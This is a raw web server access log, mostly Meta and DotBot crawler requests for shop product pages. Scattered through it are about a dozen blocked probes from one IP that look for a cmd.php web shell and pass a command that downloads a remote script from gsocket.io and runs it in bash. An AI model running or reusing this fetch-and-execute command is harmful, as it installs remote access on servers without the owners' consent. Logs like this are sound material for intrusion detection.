157.230.44.159 - - [08/Jun/2025:09:51:22 -0600] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.18 - - [08/Jun/2025:09:51:23 -0600] "GET /shopdetail/1489277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:51:28 -0600] "GET /shopdetail/1007777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:51:39 -0600] "GET /shopdetail/1698977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [08/Jun/2025:09:51:47 -0600] "GET /shopdetail/1313777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:51:57 -0600] "GET /shopdetail/1422677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.2 - - [08/Jun/2025:09:52:00 -0600] "GET /shopdetail/1315577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:52:00 -0600] "GET /shopdetail/1741277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:52:18 -0600] "GET /shopdetail/1734977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [08/Jun/2025:09:52:24 -0600] "GET /shopdetail/1417277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [08/Jun/2025:09:52:52 -0600] "GET /shopdetail/1671977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:52:55 -0600] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.28 - - [08/Jun/2025:09:53:00 -0600] "GET /shopdetail/1716077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:53:01 -0600] "GET /shopdetail/1425377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [08/Jun/2025:09:53:11 -0600] "GET /shopdetail/1163477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:53:17 -0600] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.27 - - [08/Jun/2025:09:53:18 -0600] "GET /shopdetail/1397477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [08/Jun/2025:09:53:25 -0600] "GET /shopdetail/1536077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:53:35 -0600] "GET /shopdetail/1257077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:53:36 -0600] "GET /shopdetail/1311977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.2 - - [08/Jun/2025:09:53:38 -0600] "GET /shopdetail/1366877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [08/Jun/2025:09:53:39 -0600] "GET /shopdetail/1094177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:53:49 -0600] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
157.230.44.159 - - [08/Jun/2025:09:53:58 -0600] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.7 - - [08/Jun/2025:09:54:01 -0600] "GET /shopdetail/1590077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:54:14 -0600] "GET /shopdetail/1069877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:54:20 -0600] "GET /shopdetail/1643177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:54:40 -0600] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.26 - - [08/Jun/2025:09:54:43 -0600] "GET /shopdetail/1657577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [08/Jun/2025:09:54:50 -0600] "GET /shopdetail/1646777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:55:07 -0600] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.26 - - [08/Jun/2025:09:55:16 -0600] "GET /shopdetail/1036577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [08/Jun/2025:09:55:21 -0600] "GET /shopdetail/1170677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [08/Jun/2025:09:55:22 -0600] "GET /shopdetail/1148177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [08/Jun/2025:09:55:26 -0600] "GET /shopdetail/1483877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:55:26 -0600] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
157.230.44.159 - - [08/Jun/2025:09:55:27 -0600] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.30 - - [08/Jun/2025:09:55:29 -0600] "GET /shopdetail/1140977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:55:53 -0600] "GET /shopdetail/1162577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:56:02 -0600] "GET /shopdetail/1180577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:56:20 -0600] "GET /shopdetail/1218377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:09:56:23 -0600] "GET /shopdetail/1043777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:56:28 -0600] "GET /shopdetail/1554077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:56:31 -0600] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
216.244.66.200 - - [08/Jun/2025:09:56:34 -0600] "GET /robots.txt HTTP/1.1" 200 1070 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
157.230.44.159 - - [08/Jun/2025:09:56:40 -0600] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.17 - - [08/Jun/2025:09:56:45 -0600] "GET /shopdetail/1618877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:56:59 -0600] "GET /shopdetail/1271477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [08/Jun/2025:09:57:02 -0600] "GET /shopdetail/1141877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:09:57:07 -0600] "GET /shopdetail/1168877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:09:57:23 -0600] "GET /shopdetail/1338077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:57:25 -0600] "GET /shopdetail/1743077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [08/Jun/2025:09:57:34 -0600] "GET /shopdetail/1251677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:57:49 -0600] "GET /shopdetail/1573877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:57:51 -0600] "GET /shopdetail/1571177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:58:00 -0600] "GET /shopdetail/1711577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [08/Jun/2025:09:58:01 -0600] "GET /shopdetail/1055477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:58:03 -0600] "GET /shopdetail/1739477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:58:05 -0600] "GET /shopdetail/1174277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:58:09 -0600] "GET /shopdetail/999677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:58:12 -0600] "GET /shopdetail/1584677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:58:14 -0600] "GET /shopdetail/1339877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:58:14 -0600] "GET /shopdetail/1306577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:58:14 -0600] "GET /shopdetail/1134677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:58:15 -0600] "GET /shopdetail/1246277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:58:19 -0600] "GET /shopdetail/1722377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:58:20 -0600] "GET /shopdetail/994277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [08/Jun/2025:09:58:20 -0600] "GET /shopdetail/1596377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:58:21 -0600] "GET /shopdetail/1065377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:58:23 -0600] "GET /shopdetail/1221077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [08/Jun/2025:09:58:25 -0600] "GET /shopdetail/1462277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:58:26 -0600] "GET /shopdetail/1236377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [08/Jun/2025:09:58:32 -0600] "GET /shopdetail/1533377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:58:33 -0600] "GET /shopdetail/1365077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.244.66.200 - - [08/Jun/2025:09:58:34 -0600] "GET /pdf/compose%20express/expressworkflow-brochure.pdf HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
57.141.2.22 - - [08/Jun/2025:09:58:36 -0600] "GET /shopdetail/1708877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:58:38 -0600] "GET /shopdetail/986177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:58:39 -0600] "GET /shopdetail/1390277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:58:43 -0600] "GET /shopdetail/1429877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:58:46 -0600] "GET /shopdetail/1696277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:58:49 -0600] "GET /shopdetail/1619777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:58:53 -0600] "GET /shopdetail/1591877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:58:54 -0600] "GET /shopdetail/1111277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:58:55 -0600] "GET /shopdetail/1563077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:59:00 -0600] "GET /shopdetail/1697177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:59:00 -0600] "GET /shopdetail/1428977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:59:03 -0600] "GET /shopdetail/1502777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:59:03 -0600] "GET /shopdetail/1256177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:59:04 -0600] "GET /shopdetail/1130177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:59:04 -0600] "GET /shopdetail/1099577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:59:05 -0600] "GET /shopdetail/1395677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [08/Jun/2025:09:59:05 -0600] "GET /shopdetail/1296677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:59:07 -0600] "GET /shopdetail/1677377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [08/Jun/2025:09:59:08 -0600] "GET /shopdetail/1453277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:59:15 -0600] "GET /shopdetail/1077977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:59:15 -0600] "GET /shopdetail/1522577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:59:16 -0600] "GET /shopdetail/1653077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:59:16 -0600] "GET /shopdetail/1451477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:09:59:20 -0600] "GET /shopdetail/1203977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [08/Jun/2025:09:59:20 -0600] "GET /shopdetail/1104977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:59:24 -0600] "GET /sitemap-11.xml HTTP/1.1" 200 147075 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:59:24 -0600] "GET /shopdetail/1692677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:09:59:26 -0600] "GET /shopdetail/1291277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [08/Jun/2025:09:59:28 -0600] "GET /shopdetail/1220177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:59:30 -0600] "GET /shopdetail/8618144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:59:30 -0600] "GET /shopdetail/8728844 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:59:30 -0600] "GET /shopdetail/1699877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:59:32 -0600] "GET /shopdetail/1725077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [08/Jun/2025:09:59:34 -0600] "GET /shopdetail/8824244 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [08/Jun/2025:09:59:35 -0600] "GET /shopdetail/1107677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:59:36 -0600] "GET /shopdetail/1432577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:59:36 -0600] "GET /shopdetail/1565777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:59:37 -0600] "GET /shopdetail/1448777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:59:39 -0600] "GET /shopdetail/8160044 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:59:42 -0600] "GET /shopdetail/8642444 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:59:43 -0600] "GET /shopdetail/8374244 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:59:43 -0600] "GET /shopdetail/8772044 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:59:43 -0600] "GET /shopdetail/8396744 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:59:45 -0600] "GET /shopdetail/8285144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:59:48 -0600] "GET /shopdetail/8196044 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:59:59 -0600] "GET /shopdetail/8790944 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [08/Jun/2025:10:00:00 -0600] "GET /shopdetail/8708144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.2 - - [08/Jun/2025:10:00:02 -0600] "GET /shopdetail/8837744 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:10:00:02 -0600] "GET /shopdetail/8672144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [08/Jun/2025:10:00:02 -0600] "GET /shopdetail/8538944 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [08/Jun/2025:10:00:03 -0600] "GET /shopdetail/8699144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:10:00:05 -0600] "GET /shopdetail/8612744 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [08/Jun/2025:10:00:08 -0600] "GET /shopdetail/8240144 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:10:00:08 -0600] "GET /shopdetail/8331944 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:10:00:09 -0600] "GET /shopdetail/8359844 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:10:00:11 -0600] "GET /shopdetail/8397644 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:10:00:11 -0600] "GET /shopdetail/8583044 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:10:00:13 -0600] "GET /shopdetail/8739644 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [08/Jun/2025:10:00:18 -0600] "GET /shopdetail/8688344 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:10:00:22 -0600] "GET /shopdetail/8169044 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [08/Jun/2025:10:00:22 -0600] "GET /shopdetail/8643344 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
